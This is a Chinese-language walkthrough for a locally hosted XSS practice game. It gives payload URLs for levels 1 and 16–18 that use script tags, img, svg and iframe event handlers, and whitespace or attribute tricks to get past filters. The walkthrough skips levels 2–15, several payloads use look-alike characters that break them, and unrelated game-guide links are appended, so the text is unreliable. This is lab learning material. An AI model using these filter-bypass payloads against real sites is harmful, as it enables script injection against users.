Xss小游戏通关攻略带解释

Xss小游戏通关攻略

实验环境：xss小游戏源码+phpstudy

源码地址：https://files.cnblogs.com/files/Eleven-Liu/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F.zip

实验步骤：启动phpstudy，浏览器访问127.0.0.1/xss/后提示点击图片进入第一关。

第一关：输入的变量直接被输出，直接构造payload即可。

http://127.0.0.1/xss/level1.php?name=<script>alert(1)</script>

http://127.0.0.1/xss/level16.php?keyword=%3Cimg%0dsrc=1%0dοnerrοr=alert(2)%3Ealert(2)

http://127.0.0.1/xss /level16.php?keyword=<img%0Dsrc=1%0Dοnerrοr=alert()>

http://127.0.0.1/xss /level16.php?keyword=<img%0asrc=1%0aοnerrοr=alert()>

http://127.0.0.1/xss /level16.php?keyword=<img%0asrc=x%0donError=alert('xss')>

http://127.0.0.1/xss /level16.php?keyword=<iframe%0asrc=x%0dοnmοuseοver=alert’1’></iframe>

http://127.0.0.1/xss /level16.php?keyword=<svg%0aοnlοad=alert’1’></svg>

第十七关：arg01和arg02  被htmlspecialchars过滤了，通过οnmοuseοver='alert(1)'绕过。

http://127.0.0.1/xss/level17.php?arg01=a&arg02=%20οnmοuseοver=alert%282%29

第十八关：同十七，直接把arg02 设置为οnmοuseοver='alert(1)'

http://192.168.40.128/xss/level18.php?arg01=a&arg02= οnmοuseοver=alert(2)

第十九关和二十关属于Flash xss,略过。

相关知识

Xss小游戏通关攻略带解释
明日之后攻略带柱栅栏-明日之后攻略带柱栅栏的建筑
吞食天地3攻略带图-游戏体验及内容介绍 必看
《整个活吧》妖怪公寓帮妖怪伪装成人通关攻
V社修复《反恐精英 2》游戏漏洞：可抓取玩家 IP 地址、发起 XSS 攻击
英雄联盟AD意思解释
我玩梗贼6浪漫约会通关攻略 玩梗怎么解释
汉字魔法攻长城通关攻略
史上最贱小游戏3通关攻略
4399小游戏手游玩法与攻略大揭秘